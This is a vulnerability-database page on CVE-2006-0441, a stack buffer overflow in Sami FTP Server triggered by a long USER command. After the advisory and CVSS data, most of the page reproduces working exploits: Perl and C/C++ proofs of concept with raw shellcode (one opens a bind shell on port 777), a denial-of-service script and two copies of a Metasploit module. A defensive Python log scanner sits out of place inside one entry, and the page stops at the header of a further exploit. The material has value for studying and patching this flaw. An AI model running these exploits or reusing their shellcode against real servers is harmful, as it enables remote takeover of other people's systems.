CVE-2006-0441
CVSS 7.5
Published: 2006-01-26 17:03:00
Revised: 2011-03-07 21:30:03

[Original] Stack-based buffer overflow in Sami FTP Server 2.0.1 allows remote attackers to execute arbitrary code via a long USER command, which triggers the overflow when the log is viewed.


[CNNVD] Sami FTP Server stack buffer overflow (CNNVD-200601-353)

A stack-based buffer overflow exists in Sami FTP Server 2.0.1; a remote attacker can execute arbitrary code via a long USER command, which triggers the overflow when the log is viewed.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0441
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0441
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-353
(Official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/0317
(UNKNOWN)  VUPEN  ADV-2006-0317
http://www.securityfocus.com/bid/16370
(UNKNOWN)  BID  16370
http://www.critical.lt/?vulnerabilities/208
(VENDOR_ADVISORY)  MISC  http://www.critical.lt/?vulnerabilities/208
http://secunia.com/advisories/18574
(VENDOR_ADVISORY)  SECUNIA  18574
http://xforce.iss.net/xforce/xfdb/24325
(UNKNOWN)  XF  samiftpserver-user-bo(24325)
http://www.securityfocus.com/archive/1/archive/1/423148/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060124 SamiFTPd buffer overflow
http://www.karjasoft.com/samiftp/news
(UNKNOWN)  CONFIRM  http://www.karjasoft.com/samiftp/news
http://downloads.securityfocus.com/vulnerabilities/exploits/sami_ftp_poc.pl
(UNKNOWN)  MISC  http://downloads.securityfocus.com/vulnerabilities/exploits/sami_ftp_poc.pl

- Vulnerability information

Sami FTP Server stack buffer overflow
High severity  Buffer overflow
2006-01-26 00:00:00 2006-01-27 00:00:00
Remote
A stack-based buffer overflow exists in Sami FTP Server 2.0.1; a remote attacker can execute arbitrary code via a long USER command, which triggers the overflow when the log is viewed.

- Advisories and patches

        

- Vulnerability information (1448)

Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC (EDBID:1448)
windows remote
2006-01-25 Verified
0 Critical Security
#!/usr/bin/perl
# Sami FTP Server v2.0.1 Remote notepad.exe execution PoC by Critical Security research http://www.critical.lt
# Tested on Windows XP SP2, Windows XP SP0 and even on FreeBSD 6.0-RELEASE Wine 0.9.6 :))

use Net::FTP;                 # <- yeah, I'm lazy :)
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------\n";
print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n";
print " Offsets: \n";
print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n";
print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n";
print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n";
print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp\n";
print " If values not specified, default values will be used.\n";
print " Example : ./exploit.pl -h127.0.0.1 -y127.0.0.1 -o1\n";
print "--------------------------------------------------------------------\n";
}
$host =   "127.0.0.1";        # victim IP
$yourip = "127.0.0.1" ;       # Needed to align the shellcode: your IP address also gets written onto the stack, so put your external IP here (if you have none, the gateway IP)
$offset = "\xE0\x3A\xB4\x76"; # default offset to the call esp in winmm.dll (WinXP SP2)

foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/);
$offset = $1 if ($_=~/-o(.*)/);
}
# to find offsets use findjmp.exe or the metasploit.com opcode db ;)  (call esp/jmp esp..)
switch ($offset) {
case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp
case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp
case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp
case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp
}

foreach $letter (split '', $yourip) { $c++;};
$ftp = Net::FTP->new($host, Debug => 0)  or die "Cannot connect: $@";
$user = "A" x 213 . # ride up to the return address :O  (shellcode could be crammed in here too :) )
"A" x (15 - $c)   . # a few more bytes for alignment, since the IP address is also written onto the stack, so where the ret address goes has to be computed from it
$offset .           # ret address pointing at some DLL's call esp or jmp esp, or anything similar; what matters is that we land in esp ;)
"\x90" x 25 .       # NOP sled, to line up with the address in esp

# shellcode that launches notepad (a shellcode for those who said critical likes DoS :*) - if you want, drop in a proper one..
"\xCD\x03".
"\xEB\x61\x56\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C".
"\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\xC3\x60\x8B\x6C".
"\x24\x24\x8B\x45\x3C\x8B\x54\x05\x78\x01\xEA\x8B".
"\x4A\x18\x8B\x5A\x20\x01\xEB\xE3\x34\x49\x8B\x34".
"\x8B\x01\xEE\x31\xFF\x31\xC0\xFC\xAC\x84\xC0\x74".
"\x07\xC1\xCF\x0D\x01\xC7\xEB\xF4\x3B\x7C\x24\x28".
"\x75\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B".
"\x5A\x1C\x01\xEB\x8B\x04\x8B\x01\xE8\x89\x44\x24".
"\x1C\x61\xC3\xE8\x9A\xFF\xFF\xFF\x68\x98\xFE\x8A".
"\x0E\x50\xE8\xA2\xFF\xFF\xFF\xEB\x02\xEB\x05\xE8".
"\xF9\xFF\xFF\xFF\x5B\x83\xC3\x1C\x33\xC9\x88\x0B".
"\x83\xEB\x0B\x41\x51\x53\xFF\xD0\x90\x6E\x6F\x74".
"\x65\x70\x61\x64\x2E\x65\x78\x65\x01";
$ftp->login("$user","biatch");

# milw0rm.com [2006-01-25]
		

- Vulnerability information (1462)

Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp) (EDBID:1462)
windows remote
2006-01-31 Verified
21 HolyGhost
// Two includes.
#include <fstream.h>
#include <winsock2.h>
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib' 
#pragma comment(lib, "ws2_32")

char MyShellCode[] =       // XOR by \x99\x99\x99\x99.
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"
"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
                        "\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x3D\x83\xE9\x5E"
"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\xE7\x41\x7B\xEA"
"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\xAA\xAB\xB7\xDD"
"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\xA9\xC0\xFD\x12"
"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x95\x14\xCE\xB5"
"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC7\x98\x77\xF3\x93"
"\xC0\x12\xE4\x99\x19\x60\x9F\xED\x7D\xC8\xCA\x66\xAD\x16\x71\x09"
"\x99\x99\x99\xC0\x10\x9D\x17\x7B\x72\xA8\x66\xFF\x18\x75\x09\x98"
"\xCD\xF1\x98\x98\x99\x99\x66\xCC\xB9\xCE\xCE\xCE\xCE\xDE\xCE\xDE"
"\xCE\x66\xCC\x85\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x99\x9A\x90\x10"
"\x7F\xF3\x89\xCF\xCA\x66\xCC\x81\xCE\xCA\x66\xCC\x8D\xCE\xCF\xCA"
"\x66\xCC\x89\x10\x5B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3"
"\x8C\xC0\x6A\x32\x10\x4E\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10"
"\xE5\xBD\xD1\x10\xE5\xBD\xD5\x10\xE5\xBD\xC9\x14\xDD\xBD\x89\xCD"
"\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEC\x99\xC8\x66\xCC\xA9"
"\x10\x78\xF1\x66\x66\x66\x66\x66\xA8\x66\xCC\xB5\xCE\x66\xCC\x95"
"\x66\xCC\xB1\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD"
"\x9C\xE1\x98\x73\x12\xD3\x81\x12\xC3\xB9\x98\x72\x7A\xAB\xD0\x12"
"\xAD\x12\x98\x77\xA8\x66\x65\xA8\x59\x35\xA1\x79\xED\x9E\x58\x56"
"\x94\x98\x5E\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3\xBD\x98\x72"
"\xFF\x12\x95\xD2\x12\xC3\x85\x98\x72\x12\x9D\x12\x98\x71\x72\x9B"
"\xA8\x59\x10\x73\xC6\xC7\xC4\xC2\x5B\x91\x99";

static char PayLoad[1329];  

int IP;                     
int Port;                   
int szNOP1, szNOP2;         
int Nop; 

// Jump ESP by library User32 on Win2000 SP4 fr..
char JmpESP[] = "\x0C\xED\xE3\x77";
// Flag ID server Sami FTP.
char TargetFlag[] = "220-\r\n220 Features p a .";
char RecvBuff[200];

void usage(){
  cout<<" "<<endl;
  cout<<"USAGE : ThisAppz [Target IP] [Port to connect FTP]"  <<endl;
  cout<<"If a port isn't specified, the default port will be 21."<<endl;
  cout<<"Without IP, the Xploit run in local mode [127.0.0.1]"<<endl;
  cout<<" "<<endl;
  return;}

void Info(){
  cout<<" "<<endl;
  cout<<" ============================================== v1.0 =="<<endl;
  cout<<" ====== Sami FTP Remote Buffer Overflow Exploit  ======"<<endl;
  cout<<" ================== Coded by HolyGhost ================"<<endl;
  cout<<" ====== Distributed for educational purposes only ====="<<endl;
  cout<<" ================== StormyTeam@free.fr ================"<<endl;
  cout<<" ======================================================"<<endl;
  cout<<" "<<endl;}

int main(int argc,char *argv[]){

Info();
if ( ( argc > 3 ) ){usage();return -1;} 

if( argc > 1 ){ 
  cout<<"argv[1]"<<"\t"<<argv[1]<<endl;
  IP = htonl( inet_addr( argv[1] ) );}
else{ 
  cout<<"Local test mode : 127.0.0.1"<<endl;
  IP = htonl( inet_addr( "127.0.0.1" ) );}

if( argc == 3 ){
  cout<<"argv[2]"<<"\t"<<argv[2]<<endl;
  Port = atoi( argv[2] );}
else{
  cout<<"Port by default : 21"<<endl;
  Port = 21;}

WSADATA wsadata;

if( WSAStartup( MAKEWORD( 2, 0 ),&wsadata )!=0 ){
  cout<<"[-] WSAStartup error. Bye!"<<endl;
  return -1;}

SOCKET sck;
fd_set mask;              
struct timeval timeout;
struct sockaddr_in server;

sck = socket( AF_INET, SOCK_STREAM, 0 ); // TCP.

if( sck == -1 ){cout<<"[-] Socket() error. Bye!"<<endl; return -1;}
 
server.sin_family = AF_INET; // Address Internet 4 bytes.
server.sin_addr.s_addr = htonl( IP );
server.sin_port = htons( Port ); // Definition port.
// Try to connect on FTP server.
connect( sck,( struct sockaddr *)&server, sizeof( server ) );

timeout.tv_sec = 3; // Delay 3 seconds.
timeout.tv_usec = 0;
FD_ZERO( &mask );
FD_SET( sck, &mask );

switch( select( sck + 1, NULL, &mask, NULL, &timeout ) ){
  case -1:{ // Problem! 
    cout<<"[-] Select() error. Bye!"<<endl;
    closesocket( sck );
	return -1;}

  case 0:{ // Problem!
	cout<<"[-] Connect() error. Bye!"<<endl;
	closesocket( sck );
	return -1;}

  default: 
  if(FD_ISSET( sck, &mask ) ){
    recv( sck, RecvBuff, sizeof( RecvBuff ) - 1, 0 ); // Receive the banner; RecvBuff is only 200 bytes, so never ask for 256.

    cout<<"[+] Connected, checking the server for flag..."<<endl;
	Sleep( 500 );
	
    if ( !strstr( RecvBuff, TargetFlag ) ){
      cout<<"[-] This is not a valid flag from target! Bye."<<endl;
	  return -1;} // Bye!
	cout<<RecvBuff;

    Sleep( 1000 ); 
    cout<<"[+] Connected, constructing the PayLoad..."<<endl;
   
    szNOP1 = 219; // First padding.
	szNOP2 = 720; // Second padding. 
    // Zero the PayLoad buffer.
    memset( PayLoad, 0, sizeof( PayLoad ) );
    strcat( PayLoad, "USER " );     // Command User.
    // First padding.
    for( Nop = 0; Nop < szNOP1; Nop++ ){
	  strcat( PayLoad, "\x90" );}
    // New EIP register.
	strcat( PayLoad, JmpESP );
    // Second Padding.
    for( Nop = 0; Nop < szNOP2; Nop++ ){
	  strcat( PayLoad, "\x90" );}
    strcat( PayLoad, MyShellCode );
    strcat( PayLoad, "\x0D\x0A" );
    // Send fully PayLoad.
    if( send( sck, PayLoad, strlen( PayLoad ), 0 ) == SOCKET_ERROR ){
	  cout<<"[-] Sending error, the server prolly rebooted."<<endl;
	  return -1;}

    Sleep( 1000 ); 

    cout<<"[+] Nice!!! See your log for execute an evil command."<<endl;
    cout<<"[+] After, try to connect on FTP server by port 777."<<endl;
    return 0;
  }
}

closesocket( sck );
WSACleanup();
return 0; // Bye!

}
// Fully PayLoad description (1329 Bytes) -
// [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [\r\n]
// 5        219             4      720             379         2

// milw0rm.com [2006-01-31]
		

- Vulnerability information (3127)

Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC (EDBID:3127)
windows dos
2007-01-14 Verified
0 Marsu
/************************************************************************
*KarjaSoft Sami FTP Server 2.0.2 USER/PASS buffer overflow              *
*                                                                       *
*Sending a long USER / PASS request to server triggers the vulnerability*
*EAX and EDX are owned leading to code execution                        *
*This is only a POC                                                     *
*Thanks to rewterz and Muhammad Ahmed Siddiqui for discovery            *
*                                                                       *
*Usage: sami.exe ip port                                                *
*                                                                       *
*Coded by Marsu <Marsupilamipowa@hotmail.fr>                            *
************************************************************************/

#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
	struct hostent *he;
	struct sockaddr_in sock_addr;
	WSADATA wsa;
	int ftpsock;
	char recvbuff[1024];
	char evilbuff[1024];
	int buflen=600;// 650 will kill the app. 600 just call the debugger

	if (argc!=3)
	{
		printf("[+] Usage: %s <ip> <port>\n",argv[0]);
		return 1;
	}
	WSACleanup();
	WSAStartup(MAKEWORD(2,0),&wsa);

	printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
	if ((he=gethostbyname(argv[1])) == NULL) {
		printf("Failed\n[-] Could not init gethostbyname\n");
		return 1;
	}
	if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Failed\n[-] Socket error\n");
		return 1;
	}

	sock_addr.sin_family = PF_INET;
	sock_addr.sin_port = htons(atoi(argv[2]));
	sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(sock_addr.sin_zero), '\0', 8);
	if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
		printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
		return 1;
	}
	printf("OK\n");
	memset(recvbuff,'\0',1024);
	recv(ftpsock, recvbuff, 1024, 0);

	printf("[+] Building payload ... ");
	memset(evilbuff,'A',buflen);
	memset(evilbuff+585,'B',4);	//eax and edx will be 42424262
	memcpy(evilbuff,"USER ",5);
	memcpy(evilbuff+buflen,"\r\n\0",3);
	printf("OK\n[+] Sending USER ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failed\n[-] Could not send\n");
		return 1;
	}
	printf("OK\n");
	memset(recvbuff,'\0',1024);
	recv(ftpsock, recvbuff, 1024, 0);

	memcpy(evilbuff,"PASS ",5);
	printf("[+] Sending PASS ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failed\n[-] Could not send\n");
		return 1;
	}
	printf("OK\n");
	recv(ftpsock, recvbuff, 1024, 0);

	printf("[+] Host should be down\n");
	return 0;
}

// milw0rm.com [2007-01-14]
		

- Vulnerability information (3140)

Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit (EDBID:3140)
windows remote
2007-01-17 Verified
21 UmZ
#!/usr/bin/perl
#		Exploit for SAMI FTP  version 2.0.2
#		USER/PASS BUFFER OVERFLOW ARBITRARY REMOTE CODE EXECUTION (CALC.exe) 
#		You can put you own shellcode to spawn a shell
#		Thursday 17th Jan 2007
#		Tested on : Windows 2000 SP4  (Use your own return address for other flavors)		
#		
#				
#		
#		Coded by UmZ! umz32.dll@gmail.com
#		On behalf of : Secure Bytes Inc.
#		http://www.secure-bytes.com/exploits/
#	
#
#	
#	    Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
#	    Disclaimer: This Proof of concept exploit is for educational purpose only.
#		        Please do not use it against any system without prior permission.
#          		You are responsible for yourself for what you do with this code.
#
#
#	    Note:	After executing the exploit You will get "Cannot login User or password not correct."
#			That doesn't mean exploit failed whenever you click on Sami FTP server it will crash 
#			resulting in the execution of calc.exe and will execute whenever the SAMI FTP server 
#			restarts until it is reinstalled.


use Net::FTP;


print "Coded by UmZ! umz32.dll@gmail.com\n";
print "http://www.secure-bytes.com/exploits/\n";
	
$ftp = Net::FTP->new("192.168.100.250", Debug => 0) or die "Cannot connect : $@";

my $msg ="\x90" x596;      #140
my $msg2 ="B"x484;
my $shellcode =  "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8".
		 "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1".
		 "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07".
		 "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25".
		 "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5".
		 "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d".
		 "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4".
		 "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0".
		 "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c".
		 "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b".
		 "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4";

my $test= "\x90" x 108;

my $msg1=$msg. "\x70\xFD\x8B\x01"."\x96\x64\xF8\x77". $test .  $shellcode. "\r\n";

$ftp->login($msg1."\r\n\0","umz") or die "Cannot login ", $ftp->message;

$ftp->quit;

# milw0rm.com [2007-01-17]
		

- Vulnerability information (16702)

KarjaSoft Sami FTP Server v2.02 USER Overflow (EDBID:16702)
windows remote
2010-04-30 Verified
21 metasploit
##
# $Id: sami_ftpd_user.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
			'Description'	=> %q{
					This module exploits the KarjaSoft Sami FTP Server version 2.02
				by sending an excessively long USER string. The stack is overwritten
				when the administrator attempts to view the FTP logs. Therefore, this exploit
				is passive and requires end-user interaction. Keep this in mind when selecting
				payloads. When the server is restarted, it will re-execute the exploit until
				the logfile is manually deleted via the file system.
			},
			'Author'	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'	=> MSF_LICENSE,
			'Version'	=> '$Revision: 9179 $',
			'Stance'	=> Msf::Exploit::Stance::Passive,
			'References'	=>
				[
					# This exploit appears to have been reported multiple times.
					[ 'CVE', '2006-0441'],
					[ 'CVE', '2006-2212'],
					[ 'OSVDB', '25670'],
					[ 'BID', '16370'],
					[ 'BID', '22045'],
					[ 'BID', '17835'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1448'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1452'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1462'],
					[ 'URL', 'http://www.milw0rm.com/exploits/3127'],
					[ 'URL', 'http://www.milw0rm.com/exploits/3140'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'	=>
				{
					'Space'			=> 300,
					'BadChars'		=> "\x00\x0a\x0d\x20\xff",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 	=>
				[
					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll
					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll
					[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll
				],
			'DisclosureDate' => 'Jan 24 2006'))

		register_options(
			[
				Opt::RPORT(21),
			], self.class)
	end

	def check
		connect
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /Sami FTP Server 2.0.2/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)

		login = "USER #{sploit}\r\n"
		login << "PASS " + Rex::Text.rand_char(payload_badchars)

		sock.put(login + "\r\n")

		handler
		disconnect
	end

end
		

- Vulnerability information (F83185)

KarjaSoft Sami FTP Server v2.02 USER Overflow (PacketStormID:F83185)
2009-11-26 00:00:00
patrick  metasploit.com
exploit
CVE-2006-0441,CVE-2006-2212

This Metasploit module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'		=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
			'Description'	=> %q{
				This module exploits the KarjaSoft Sami FTP Server version 2.02
				by sending an excessively long USER string. The stack is overwritten
				when the administrator attempts to view the FTP logs. Therefore, this exploit
				is passive and requires end-user interaction. Keep this in mind when selecting
				payloads. When the server is restarted, it will re-execute the exploit until
				the logfile is manually deleted via the file system.
			},
			'Author'	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'	=> MSF_LICENSE,
			'Version'	=> '$Revision$',
			'Stance'	=> Msf::Exploit::Stance::Passive,
			'References'	=>
				[
					# This exploit appears to have been reported multiple times.
					[ 'CVE', '2006-0441'],
					[ 'CVE', '2006-2212'],
					[ 'OSVDB', '25670'],
					[ 'BID', '16370'],
					[ 'BID', '22045'],
					[ 'BID', '17835'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1448'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1452'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1462'],
					[ 'URL', 'http://www.milw0rm.com/exploits/3127'],
					[ 'URL', 'http://www.milw0rm.com/exploits/3140'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},				
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'	=>
				{
					'Space'			=> 300,
					'BadChars'		=> "\x00\x0a\x0d\x20\xff",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 	=>
			[
				[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
				[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll
				[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll
				[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll					 
			],
			'DisclosureDate' => 'Jan 24 2006'))

			register_options(
			[
				Opt::RPORT(21),
			], self.class)
	end

	def check
		connect
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /Sami FTP Server 2.0.2/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)

		login = "USER #{sploit}\r\n"
		login << "PASS " + Rex::Text.rand_char(payload_badchars)

		sock.put(login + "\r\n")

		handler
		disconnect
	end

end
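The module description above says the overflow only fires when the administrator opens the log viewer, and that it replays on every restart until the log is deleted, so a defender wants to find poisoned USER/PASS entries before that GUI ever reads them. As an added defensive example (not part of the page, of the Metasploit module, or of any PoC listed here), the Python below scans raw FTP command lines, as captured on the wire or kept in a plain-text log, for the traits every PoC on this page shares: an argument far longer than any real username, a length that reaches the SEH record at about 600 bytes, non-printable bytes, and long runs of one padding byte. The thresholds and the sample lines are constructed assumptions.

```python
"""Flag FTP USER/PASS commands that look like the Sami FTP log-poisoning overflow.

Added, defensive example: thresholds are assumptions, and the sample
traffic below is constructed, not captured from a real server.
"""
from dataclasses import dataclass, field
from typing import List, Optional

MAX_SANE_ARG = 128   # assumption: no legitimate username or password is longer
SEH_OFFSET = 600     # the PoCs on this page place the SEH overwrite at about 600 bytes
MIN_RUN = 32         # assumption: this many identical bytes in a row is padding, not a name


@dataclass
class Finding:
    line_no: int
    command: str
    length: int
    reasons: List[str] = field(default_factory=list)


def parse_command(raw: bytes):
    """Split one FTP command line into (verb, argument); tolerates CRLF or bare LF."""
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    return verb.upper(), arg


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte (NOP sled / filler signature)."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def inspect_line(line_no: int, raw: bytes) -> Optional[Finding]:
    """Return a Finding for a suspicious USER/PASS line, or None for anything benign."""
    verb, arg = parse_command(raw)
    if verb not in (b"USER", b"PASS"):
        return None
    reasons = []
    if len(arg) > MAX_SANE_ARG:
        reasons.append(f"argument is {len(arg)} bytes (> {MAX_SANE_ARG})")
    if len(arg) >= SEH_OFFSET:
        reasons.append(f"reaches the SEH record at {SEH_OFFSET} bytes")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if nonprint:
        reasons.append(f"{nonprint} non-printable bytes (NOP sled or shellcode)")
    run = longest_run(arg)
    if run >= MIN_RUN:
        reasons.append(f"run of {run} identical bytes (padding)")
    if not reasons:
        return None
    return Finding(line_no, verb.decode("ascii"), len(arg), reasons)


def scan(lines) -> List[Finding]:
    """Scan an iterable of raw command lines; line numbers start at 1."""
    return [f for f in (inspect_line(n, raw) for n, raw in enumerate(lines, 1)) if f]


# Constructed sample traffic: a normal login, then three shapes seen in the PoCs above
# (filler + stand-in return address + NOP sled + stand-in code; filler to just under
# the SEH record; a NOP-padded PASS that reaches it). The addresses are placeholders.
SAMPLE = [
    b"USER alice\r\n",
    b"PASS s3cret\r\n",
    b"USER " + b"A" * 228 + b"\xde\xad\xbe\xef" + b"\x90" * 25 + b"\xcc" * 4 + b"\r\n",
    b"USER " + b"A" * 580 + b"BBBB" + b"A" * 11 + b"\r\n",
    b"PASS " + b"\x90" * 596 + b"BBBB" + b"\r\n",
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"line {f.line_no}: {f.command} argument of {f.length} bytes: " + "; ".join(f.reasons))
```

Run it over the lines of a capture or log before opening that log in the server's viewer; any hit means the log should be removed or sanitised with a plain editor instead.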
    

- Vulnerability information (F139468)

KarjaSoft Sami FTP Server 2.0.2 Buffer Overflow (PacketStormID:F139468)
2016-11-01 00:00:00
n30m1nd  
exploit,remote,overflow
CVE-2006-0441

KarjaSoft Sami FTP server version 2.0.2 USER/PASS remote buffer overflow SEH exploit.

#!/usr/bin/python
#-*- Coding: utf-8 -*-
 
### Sami FTP Server 2.0.2 - SEH Overwrite, Buffer Overflow by n30m1nd ### 
 
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
